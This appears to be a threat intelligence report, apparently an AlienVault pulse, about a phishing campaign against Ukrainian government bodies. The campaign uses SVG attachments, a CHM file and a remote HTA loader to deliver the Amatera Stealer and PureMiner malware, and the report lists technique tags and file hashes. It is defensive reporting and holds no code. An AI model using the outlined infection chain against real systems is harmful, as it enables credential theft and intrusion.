A phishing campaign targeting Ukrainian government entities uses malicious SVG files to initiate an infection chain. The attack begins with emails containing SVG attachments that redirect victims to a download site. A CHM file is then used to execute a remote HTA loader, which delivers two malware payloads: Amatera Stealer and PureMiner. Amatera Stealer harvests extensive information from infected systems, including credentials, system data, application data, browser files, and cryptocurrency wallets. PureMiner collects hardware information and monitors system activity to deploy efficient CPU or GPU mining modules. The campaign demonstrates sophisticated techniques, including fileless malware delivery and the use of multiple stages to evade detection. Author: AlienVault
Related Tags:
CountLoader
PureMiner
Amatera Stealer
T1218.001
svg
chm
T1059.007
data theft
fileless
Associated Indicators:
B8FB772D92A74DCD910AC125EAD1C50CE5834B76F58E7F107BB1E16B8C16ADBB
BF9E6BEE654831B91E891473123BBD9BC7FF3450471E653C7045F5BD8477D7A1
9D2A88F7F4D6925E654EE3EDCD334EB9496A279EE0C40F7B14405B35500EBF99
2BD4DF59071409AF58D0253202B058A6B1F1206663236DEA5163E7C30A055F21
61FEE7E2012919FAFC3B47B37753FF934F7A0CA2A567DCA5F15D45AB55AE2211
27C9C4E200815A9F474126AFA05D4266BC55AAFA9DF0681A333267E4BBD101DE
C25E4BD9E8D49F3BEEF37377414028B07986DACCE5551F96038B930FAF887ACC
C62FE8D6C39142C7D8575BD50E6F2FCD9F92C4F0A1A01411D0F3756A09FD78A7
7DEB9E6398C92CF01502F32A78C16F55354DCF3D2B062918F6651852742BC7CD